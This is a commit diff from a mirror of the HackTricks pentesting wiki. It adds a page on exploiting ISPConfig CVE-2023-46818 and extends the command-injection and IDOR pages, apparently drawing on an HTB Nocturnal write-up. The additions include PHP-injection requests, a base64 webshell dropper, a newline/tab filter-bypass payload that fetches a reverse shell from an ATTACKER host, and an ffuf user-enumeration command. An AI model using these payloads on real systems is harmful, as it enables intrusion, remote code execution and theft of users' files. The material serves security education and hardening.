mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig...
- Remove searchindex.js (auto-generated file)
This commit is contained in:
		
							parent
							
								
									7b609aef63
								
							
						
					
					
						commit
						399a99eefa
					
				| @ -430,6 +430,7 @@ | ||||
|   - [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md) | ||||
|   - [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md) | ||||
|   - [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md) | ||||
|   - [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md) | ||||
|   - [JBOSS](network-services-pentesting/pentesting-web/jboss.md) | ||||
|   - [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md) | ||||
|   - [Joomla](network-services-pentesting/pentesting-web/joomla.md) | ||||
|  | ||||
| @ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno | ||||
| - [**Golang**](golang.md) | ||||
| - [**GraphQL**](graphql.md) | ||||
| - [**H2 - Java SQL database**](h2-java-sql-database.md) | ||||
| - [**ISPConfig**](ispconfig.md) | ||||
| - [**IIS tricks**](iis-internet-information-services.md) | ||||
| - [**Microsoft SharePoint**](microsoft-sharepoint.md) | ||||
| - [**JBOSS**](jboss.md) | ||||
|  | ||||
							
								
								
									
										107
									
								
								src/network-services-pentesting/pentesting-web/ispconfig.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										107
									
								
								src/network-services-pentesting/pentesting-web/ispconfig.md
									
									
									
									
									
										Normal file
									
								
							| @ -0,0 +1,107 @@ | ||||
| # ISPConfig | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| ## Overview | ||||
| 
 | ||||
| ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation. | ||||
| 
 | ||||
| Key default paths: | ||||
| - Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx. | ||||
| - Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed). | ||||
| 
 | ||||
| Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it: | ||||
| 
 | ||||
| ```bash | ||||
| ssh -L 9001:127.0.0.1:8080 user@target | ||||
| # then browse http://127.0.0.1:9001 | ||||
| ``` | ||||
| 
 | ||||
| ## Language editor PHP code injection (CVE-2023-46818) | ||||
| 
 | ||||
| - Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1) | ||||
| - Preconditions: | ||||
|   - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor) | ||||
|   - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini` | ||||
| - Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context | ||||
| 
 | ||||
| References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below. | ||||
| 
 | ||||
| ### Manual exploitation flow | ||||
| 
 | ||||
| 1) Open/create a language file to obtain CSRF tokens | ||||
| 
 | ||||
| Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`. | ||||
| 
 | ||||
| 2) Inject PHP via records[] and save | ||||
| 
 | ||||
| Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes: | ||||
| 
 | ||||
| ```http | ||||
| POST /admin/language_edit.php HTTP/1.1 | ||||
| Host: 127.0.0.1:9001 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| Cookie: ispconfig_auth=... | ||||
| 
 | ||||
| lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?> | ||||
| ``` | ||||
| 
 | ||||
| Out-of-band test (observe ICMP): | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?> | ||||
| ``` | ||||
| 
 | ||||
| 3) Write files and drop a webshell | ||||
| 
 | ||||
| Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`): | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?> | ||||
| ``` | ||||
| 
 | ||||
| Then write a simple webshell using base64 to avoid bad characters in the POST body: | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?> | ||||
| ``` | ||||
| 
 | ||||
| Use it: | ||||
| 
 | ||||
| ```bash | ||||
| curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id' | ||||
| ``` | ||||
| 
 | ||||
| If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user. | ||||
| 
 | ||||
| ### Python PoC | ||||
| 
 | ||||
| A ready-to-use exploit automates token handling and payload delivery: | ||||
| - [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) | ||||
| 
 | ||||
| Example run: | ||||
| 
 | ||||
| ```bash | ||||
| python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password> | ||||
| ``` | ||||
| 
 | ||||
| ### Hardening | ||||
| 
 | ||||
| - Upgrade to 3.2.11p1 or later | ||||
| - Disable the language editor unless strictly needed: | ||||
| 
 | ||||
| ``` | ||||
| admin_allow_langedit=no | ||||
| ``` | ||||
| 
 | ||||
| - Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges | ||||
| - Enforce strong authentication for the built-in `admin` account | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/) | ||||
| - [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) | ||||
| - [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) | ||||
| - [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| @ -131,6 +131,37 @@ powershell C:**2\n??e*d.*? # notepad | ||||
| ../linux-hardening/bypass-bash-restrictions/ | ||||
| {{#endref}} | ||||
| 
 | ||||
| ##### Newline and tab blacklist bypass (space and metacharacters filtered) | ||||
| 
 | ||||
| Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: | ||||
| 
 | ||||
| - Inject a newline to start a new command | ||||
| - Use tabs as whitespace where space is blocked | ||||
| 
 | ||||
| Example payload for a password-like field reaching a shell (URL-encoded): | ||||
| 
 | ||||
| ``` | ||||
| 0xdf%0abash%09-c%09"id"%0a | ||||
| ``` | ||||
| 
 | ||||
| The resulting process executes as two lines: | ||||
| 
 | ||||
| ``` | ||||
| zip -x './backups/*' -r -P 0xdf | ||||
| bash	-c	"id" | ||||
| ``` | ||||
| 
 | ||||
| Chaining without `&`: fetch and execute a reverse shell in separate lines: | ||||
| 
 | ||||
| ``` | ||||
| 0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a | ||||
| ``` | ||||
| 
 | ||||
| Notes | ||||
| - Newlines are command separators for POSIX shells; tabs are valid whitespace. | ||||
| - This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. | ||||
| - See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). | ||||
| 
 | ||||
| ### Node.js `child_process.exec` vs `execFile` | ||||
| 
 | ||||
| When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API. | ||||
| @ -170,5 +201,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject | ||||
| - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) | ||||
| - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) | ||||
| - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) | ||||
| - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) | ||||
| - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do | ||||
| done | ||||
| ``` | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Error-response oracle for user/file enumeration | ||||
| 
 | ||||
| When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle: | ||||
| 
 | ||||
| - Non-existent username → "User not found" | ||||
| - Bad filename but valid extension → "File does not exist" (sometimes also lists available files) | ||||
| - Bad extension → validation error | ||||
| 
 | ||||
| With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users: | ||||
| 
 | ||||
| ```bash | ||||
| ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \ | ||||
|   -b 'PHPSESSID=<session-cookie>' \ | ||||
|   -w /opt/SecLists/Usernames/Names/names.txt \ | ||||
|   -fr 'User not found' | ||||
| ``` | ||||
| 
 | ||||
| Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage. | ||||
| 
 | ||||
| --- | ||||
| ## 2. Real-World Case Study – McHire Chatbot Platform (2025) | ||||
| 
 | ||||
| @ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces | ||||
| * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) | ||||
| * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) | ||||
| * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) | ||||
| * [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user